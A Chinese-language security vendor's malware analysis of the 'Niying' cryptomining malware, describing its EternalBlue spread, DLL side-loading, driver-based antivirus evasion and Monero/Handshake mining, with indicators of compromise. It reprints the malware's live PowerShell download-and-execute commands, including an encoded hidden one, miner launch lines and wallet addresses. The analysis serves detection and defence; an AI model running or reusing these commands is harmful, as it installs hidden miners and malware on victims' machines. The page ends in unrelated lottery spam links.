“匿影”挖礦病毒再度來襲, 小心電腦淪為他人工具!

2020-03-20 來源:安全豹作者:安全豹

        近期,金山毒霸安全團隊再次捕獲到“匿影”挖礦病毒,此病毒利用白加黑手法,通過NSA泄露工具包,永恒之藍等漏洞進行橫向傳播,執行powershell腳本進行挖礦,感染傳播,并且釋放驅動對抗殺軟。此病毒主要挖門羅幣和Handshake(hns),通過f2pool礦池進行挖礦。

        門羅幣向來是挖礦病毒的不二之選,因為其無法被追蹤,隱匿的特性,當然還有其挖礦算法支持cpu,比較“親民”,只要是電腦就可以進行cpu挖礦,而且其價格可觀。當然病毒作者選HNS的道理也大同小異,隱匿,價格,“親民”,當然能用GPU對病毒來說是更優的選擇,畢竟來錢快嘛。

image1

技術分析

        “匿影”病毒家族,大部分惡意模塊均采用VMP保護,包括驅動對抗程序,為提高分析的成本,增加分析難度。而且惡意病毒的下載傳播的服務器空間,均使用三方服務、網盤、圖床,很難捕捉其真實地址。

病毒執行流程圖

image2

計劃任務執行Powershell惡意腳本

        中病毒計算機計劃任務被添加自動運行惡意Powershell腳本

image3

  • Powershell命令行字符串為混淆字符串,解密后如下:
IEX((new-objectnet.webclient).downloadstring('http://cs.sslsngyl90.com'))
  • Powershell加載執行下載后的惡意腳本,截取一些相似部分,主要功能為加載惡意PE文件,挖礦
(new-object System.Net.WebClient).DownloadFile( 'https://img.vim-cn.com/d2/5340ae8e92a6d29f599fef426a2bc1b5217299',
'C:\ProgramData\WinRing0x64.sys')(new-object System.Net.WebClient)
.DownloadFile( 'https://img.vim-cn.com/fd/31611086fb633acbe818d26f0dc710bb8e5350',
'C:\ProgramData\officekms.exe')Start-Process -FilePath C:\ProgramData\officekms.exe '-o xmr.f2pool.com:13531 -u 
47XU72EwsukWYtYPqmWNuk5yYb5YzPGmMEfxG4BMMCDYYKSoKmnnQnxMx13oaVetgzZ6rYBsRSqbLZ7PcKaB2NSfQSRdZ9b -p x -k'
  • 釋放惡意PE文件
文件名
功能
Officekms.exe
挖礦程序
WinRing0x64.sys
CPU信息檢出
Gtt.exe
挖礦,驅動保護
Go.exe
挖礦,驅動保護
Nb.exe
挖礦程序
Office.exe
橫向傳播,漏洞利用

  • go.exe
  • go.exe是winrar創建的自解壓程序,靜默自動執行白文件XLBugReport.exe,此處利用手法為白加黑,利用迅雷模塊加載病毒惡意模塊。
image4

  • XLBugReport.exe是迅雷的錯誤報告程序
image5

  • svchost 是病毒自帶模塊(此處模擬系統模塊命名,混淆視聽)
  • svchost加載cpugpucom.dll
image6

  • cpuxmdll函數為cpugpucom.dll里面的導出函數,內存動態解密,解密后為VMP Dump
image7
image8

  • svchost調用最終病毒解密代碼載調用Officekms.exe進行挖礦
image9

  • 釋放驅動文件(命名隨機 VMP殼)對抗殺軟和ARK工具
  • HOOK內核回調,監控進程打開關閉

  image10


gtt.exe

  • Gtt.exe 也是winrar自解壓程序,利用微軟原始文件rekeywiz.exe(病毒文件名WorkstationPro.exe)文件白加黑調用自己的惡意模塊duser.dll (VMP) , wininit.exe (VMP)
image11

  image12


  • 以下是WorkstationPro.exe白文件,通過VT查詢它被其它病毒文件的利用情況,發現被許多惡意文件利用,可見白文件,白進程可能也需要我們格外關注了,表象的背后往往有一些捉摸不清的“交易”。
 image13
 image14

  • wininit.exe (VMP)調用其它模塊(officekms.exe MicrosftEdgeCP.exe)進行挖礦

   image15


C:\ProgramData\officekms.exe -o xmr.f2pool.com:13531 -u 
43uhqNUnb RnhnK54zH5cLKd1UjxzR8y4vbMBUwpTK4aL2uWv7jTphoR6vqhoGXDKfnQDB9qaA1 zmLSZ27mWMzU9k7YMGmGD.xx -p x -k 
  • MicrosftEdgeCP.exe (VMP) 是nb.exe釋放
C:\Users\Public\MicrosftEdgeCP.exe -a hns -o stratum+tcp://hns.f2pool.com:6000 -u
hs1qlxjqehrw8wth6pdwrhh0cls7y3nvpk0xdcufvw.019
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoP -N onI -W Hidden -ep Bypass -enc 
SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEA
ZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwB4AHgALgBlAG0AYQBpAGwAbQBpAGMAbwBwAC4AYwBsAHUAYgAnACkAKQA=
  • 加載驅動(VMP),對抗殺軟和ARK工具
  • HOOK內核回調,監控進程打開關閉

 image16


  • nb.exe
  • 功能為釋放挖礦程序MicrosftEdgeCP.exe(VMP) 和 OhGodAnETHlargementPill-r2.exe

  image17

office.exe

  • office.exe 釋放的文件主要目的為橫向傳播,利用永恒之藍漏洞進行攻擊

  image18


  • winlogtrf.exe為控制模塊
  • winlogtrf.exe調用永恒之藍漏洞掃描器(開源Python版本)進行掃描

 image19


  • 攻擊成功,則發送payload(x64.dll)
  • payload則會檢測QQ管家,金山毒霸殺軟和其它進程信息

 image20

    如果沒有殺軟存在,則進行感染傳播

 image21


挖礦信息

門羅幣

  • 此病毒主要通過f2pool礦池挖礦,所以不能直接獲取其錢包地址,以下是測試賬戶,挖礦時是使用此礦池的地址而不是我們的錢包地址
image22
  • f2pool門羅幣的收益情況,這個地址為f2pool的挖礦地址
47XU72EwsukWYtYPqmWNuk5yYb5YzPGmMEfxG4BMMCDYYKSoKmnnQnxMx13oaVetgzZ6rYBsRSqbLZ7PcKaB2NSfQSRdZ9b
  • 這個賬號在有一天可以挖0.18個大約6.6美金

   image23                          

image24image25


  • 當然他不止一個賬號,當然我想可以不僅僅只有下面幾個門羅幣挖礦地址
43BxCW7rEQBUtDudnUG1pc4sY9wvwaCCYh71wk8Lx9Vq5PtVMneSDp4fbh8HvtF4JyPtXcBGbW2FWN21b5MhZpN2REofAcy
44ACdsQgNRRBLmLQAEvkVoCYAVmSpy2XsQvdvS4Srnbwf9tzrbMGEjigXbDCi8iT2LQznYV2DAzgCR6K5Y6vBth84oErPyg
43uhqNUnbRnhnK54zH5cLKd1UjxzR8y4vbMBUwpTK4aL2uWv7jTphoR6vqhoGXDKfnQDB9qaA1zmLSZ27mWMzU9k7YMGmGD
可以通過以下鏈接查詢https://www.f2pool.com/xmr/addr

Handshake 

  • 挖礦方式和上面的門羅幣一樣也是通過f2pool進行的挖礦,挖礦f2pool地址
hs1qlxjqehrw8wth6pdwrhh0cls7y3nvpk0xdcufvw
https://www.f2pool.com/hns/hs1qlxjqehrw8wth6pdwrhh0cls7y3nvpk0xdcufvw

image26

以下大概一個月的收益

 image27    image28              

總結:

        可見挖礦病毒的收益還是很高的,當然這只是“借你之手”的獲利,病毒在挖礦的時候會導致計算機卡頓,運行其它軟件速度變慢,如果你有類似癥狀的時候,要想想是不是中了挖礦病毒了,及時安裝金山毒霸掃描查殺,以免淪為他人的“工具”。

        此病毒是通過BT下載器,激活工具等等免費破解工具進行的傳播,友情提示,大家下載軟件,盡量選擇官方下載,第三方下載很有可能存在病毒捆綁,或者安裝金山毒霸,即便不小心下載了惡意捆綁軟件也可以及時查漏補缺,及時為你攔截相關病毒。

        毒霸很好地支持計劃任務,powershell,等關鍵可疑行為的查殺攔截

 image29


IOC

MD5:

974b7dd2e5f32297ac498d4b4816014a

95dd28e23472e0f2c561b0168e4d4de3

ca8ab64cda1205f0993a84bc76ad894a

124d75d7214a16635828982c6c24b8d2

39e5b7e7a52c4f6f86f086298950c6b8

0c0195c48b6b8582fa6f6373032118da

URL:

hxxp://cpu/sslsngyl90[.]com/vip.txt

hxxp://cpu.sslsngyl90[.]com/vip.txt

hxxps://img.vim-cn[.]com/d2/5340ae8e92a6d29f599fef426a2bc1b5217299

hxxps://img.vim-cn[.]com/fd/31611086fb633acbe818d26f0dc710bb8e5350

hxxps://img.vim-cn[.]com/c9/b3a8ada87d992f7ef6fe68b6ecbadc339c71a1

hxxps://img.vim-cn[.]com/82/651423b4a6a5fb251b87ebec0f44d1cd862c21



? 515金蟾捕鱼游戏中心 查看福建22选5走势图 山东十一选五走势图结果 甘肃快三推荐号码 甘肃快3开奖走势图 投资股票交流微信群 湖北十一选五爱彩乐遗漏 黑龙江22选5开奖结果查询表 大象彩票极速飞艇 股票怎么买卖 广东快乐10分钟开奖预测